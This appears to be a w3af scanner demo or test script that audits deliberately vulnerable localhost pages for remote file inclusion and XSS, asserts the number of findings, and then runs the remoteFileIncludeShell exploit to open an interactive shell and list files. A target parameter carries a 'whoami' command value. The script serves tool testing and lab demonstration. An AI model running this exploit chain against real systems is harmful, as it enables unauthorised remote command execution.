# This is the remoteFileInclude demo:

plugins
audit remoteFileInclude,xss
audit config remoteFileInclude
view
set listenAddress 127.0.0.1
set usew3afSite False
back
output console,textFile
output
output config textFile
set fileName output-w3af.txt
set verbose True
back
back
target
set target http://localhost/w3af/remoteFileInclusion/vulnerable.php?file=f0as9, http://localhost/w3af/xss/test-xss.php?a=099&b=whoami
back
start

assert len( kb.kb.getData('remoteFileInclude', 'remoteFileInclude') ) == 3
assert len( kb.kb.getData('xss', 'xss') ) == 1

exploit
exploit config remoteFileIncludeShell
set useXssBug True
back
exploit remoteFileIncludeShell
interact 0

ls
endInteraction
back
exit
